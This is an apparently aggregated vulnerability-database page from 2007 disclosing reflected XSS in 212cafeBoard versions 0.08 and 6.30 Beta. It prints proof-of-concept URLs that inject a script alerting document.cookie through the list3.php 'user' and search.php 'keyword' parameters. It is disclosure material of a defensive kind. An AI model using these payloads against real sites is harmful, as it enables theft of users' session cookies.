XSS in 212cafeBoard ( Verision 0.08 & 6.30 Beta )

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1053051 漏洞类型
发布时间 2007-02-02 更新时间 2007-02-02
CVE编号 CVE-2007-0550
CVE-2007-0549
CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2007020017
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
Hello

Vulnerable : 212cafeBoard 
Version: 0.08 Beta
         6.30 Beta
Web : http://www.212cafe.com

i found XSS 212cafeBoard v6.30 Beta :

http://www.example.com/Board/list3.php?user=[XSS]

For Example , you can put :
http://www.example.com/board/list3.php?user='><script>alert(document.coo
kie);</script>

-----------------
and i found XSS in 212cafeBoard v0.08 beta

http://www.example.com/board/search.php?keyword=[XSS]

For Example :
http://www.example.com/board/search.php?keyword='><script>alert(document
.cookie);</script>

-------------------
Discoverey By Linux_Drox
www.LeZr.Com/vb

Best Regards ,,,,